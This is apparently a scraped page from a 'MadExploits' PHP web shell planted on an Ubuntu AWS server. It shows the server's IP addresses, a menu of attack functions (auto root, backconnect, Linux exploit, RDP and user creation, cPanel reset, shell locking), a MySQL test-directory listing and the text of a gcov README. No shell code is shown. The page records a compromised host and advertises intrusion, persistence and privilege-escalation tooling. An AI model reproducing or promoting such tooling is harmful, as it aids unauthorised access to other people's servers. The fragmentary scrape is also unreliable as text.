Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.144.162.109
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
[ HOME SHELL ]
Name
Size
Permission
Action
collections
[ DIR ]
drwxr-xr-x
extra
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
r
[ DIR ]
drwxr-xr-x
std_data
[ DIR ]
drwxr-xr-x
suite
[ DIR ]
drwxr-xr-x
t
[ DIR ]
drwxr-xr-x
README
2.75
KB
-rw-r--r--
README.gcov
655
B
-rw-r--r--
README.stress
4.49
KB
-rw-r--r--
asan.supp
1.19
KB
-rw-r--r--
lsan.supp
1.21
KB
-rw-r--r--
mtr
218.48
KB
-rwxr-xr-x
mysql-stress-test.pl
36.37
KB
-rwxr-xr-x
mysql-test-run
218.48
KB
-rwxr-xr-x
mysql-test-run.pl
218.48
KB
-rwxr-xr-x
valgrind.supp
31.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.gcov
To be able to see the level of coverage with the current test suite, do the following: - Make sure gcov is installed - Compile the MySQL distribution with BUILD/compile-pentium-gcov (if your machine does not have a pentium CPU, hack this script, or just live with the pentium-specific stuff) - In the mysql-test directory, run this command: ./mysql-test-run -gcov - To see the level of coverage for a given source file: grep source_file_name /tmp/gcov.out - To see which lines are not yet covered, look at source_file_name.gcov in the source tree. Then think hard about a test case that will cover those lines, and write one!
Close